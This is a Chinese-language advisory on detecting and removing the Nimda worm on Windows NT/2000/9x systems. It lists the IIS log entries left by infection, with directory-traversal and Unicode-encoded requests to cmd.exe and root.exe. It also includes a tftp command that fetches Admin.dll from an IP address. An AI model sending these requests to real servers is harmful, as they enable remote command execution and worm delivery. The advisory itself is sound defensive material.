感染Nimda蠕虫病毒

 
                                                                                              如何判定感染Nimda蠕虫病毒
1、感染此病毒的NT和2000服务器，在WINNT\SYSTEM32\LOGFILES\W3SVC1目录下的
　日志文件中含有以下内容
　GET   /scripts/root.exe?/c+dir  
　GET   /MSADC/root.exe?/c+dir  
　GET   /c/winnt/system32/cmd.exe?/c+dir  
　GET   /d/winnt/system32/cmd.exe?/c+dir  
　GET   /scripts/..%5c../winnt/system32/cmd.exe?/c+dir  
　GET   /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir  
　GET   /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir  
GET/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
　GET   /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir  
　GET   /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir  
　GET   /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir  
　GET   /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir  
　GET   /scripts/..%35c../winnt/system32/cmd.exe?/c+dir  
　GET   /scripts/..%35c../winnt/system32/cmd.exe?/c+dir  
　GET   /scripts/..%5c../winnt/system32/cmd.exe?/c+dir  
　GET   /scripts/..%2f../winnt/system32/cmd.exe?/c+dir  
　GET,   /scripts/..%5c../winnt/system32/cmd.exe  
　如果日志存在以下内容，则表明该系统已受到感染，  
　/c+tftp%20-i%2010.88.40.89%20GET%20Admin.dll%20c:\Admin.dll  
2、感染病毒的Windows   NT和2000系统中存在大量的readme.eml病毒文件和后缀为nws   的文件，长度为78K。在各个分区的根目录下存在Admin.dll文件（如：c:\admin.dll、   d:\admin.dll），其文件长度为56K（57344字节）   。在system目录下存在mmc.exe文件   ，文件长度也为56K。在c:\innetpub\scripts目录下存在tftpxxx的文件。这些都是病毒   代码。  
3、Windows   9X系统中的system.ini文件内容被修改  
　正常情况为：Shell   =   explorer.exe  
　感染病毒后变为：Shell   =   explorer.exe   load.exe   -dontrunold      
4、在Windows   9x系统下，存在如下文件load.exe、   riched20.dll，这些文件都是系统的   ，隐含的属性，需要修改文件   。磁盘的可写目录中存在很多后缀为eml的文件。  
5、感染病毒的系统中，在c:\tmp目录下存在大量的mepxx.tmp.exe和mepxx.tmp文件。这   些都是病毒代码。  

 

解决方案   ：  
1、与网络断开，同时去掉磁盘的网络共享，防止进一步通过内网传染。  
2、下载安装补丁程序  
对于安装IIS的NT/2000服务器，要下载安装如下补丁:  
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp对于所有的IE浏览器（5.0版本以上的系统），要下载安装如下补丁:  

Http://www.microsoft.com/technet/security/bulletin/MS01-020.asp  
3、Windows   9x系统需要将system.ini中的Shell   =   explorer.exe   load.exe   -dontrunold   　改为  
　　Shell   =   explorer.exe  
4、删除wininit.ini文件中的内容。      
5、用干净的   Riched20.DLL（大约100k）文件替换染毒的同名Riched20.DLL文件（57344字节）,或重装Office。  
6、如果使用的是WinNT或者Win2000，打开“控制面板|用户和密码”，将Administrator组中的guest帐号删除。  
7、升级杀毒软件，然后使用杀毒软件清除系统中的病毒程序，必须注意由于杀读软件缺省   设置是检测程序文件，为了防止漏杀eml、tmp等带毒文件，清务必将杀毒软件设置为检   测、清除所有文件。  
8、检测清除后，请重新启动系统，再次检查系统中是否还存在第三项中2、4、5子项中描   述的病毒文件。如果没有则表明已清除病毒。  
9、NT/2000用户还需检查在WINNT\SYSTEM32\LOGFILES\W3SVC1目录下的日志文件中是否还含有以下内容  
GET   /scripts/root.exe?/c+dir  
GET   /MSADC/root.exe?/c+dir  
GET   /c/winnt/system32/cmd.exe?/c+dir  
GET   /d/winnt/system32/cmd.exe?/c+dir  
GET   /scripts/..%5c../winnt/system32/cmd.exe?/c+dir  
GET   /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir  
GET   /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir  
10、安装了邮件防病毒网关的邮件服务器要及时进行升级，可有效防止病毒从邮件传播。  
如果存在这些内容，则表明系统还在遭受其他染毒系统的攻击，但是不会再感染病毒。请将日志文件发给我中心，以协助我们通知其他感染病毒的用户。  
计算机病毒防治产品检验中心暨国家计算机病毒应急处理中心目前正在密切监视该病毒的发展动向，目前，已有瑞星公司、趋势科技公司、金山公司、冠群金辰公司、北信源公司江民公司、上海创源公司报告了该病毒的处理方案。其中瑞星和北信源、金山公司的清毒工具已经确认可行。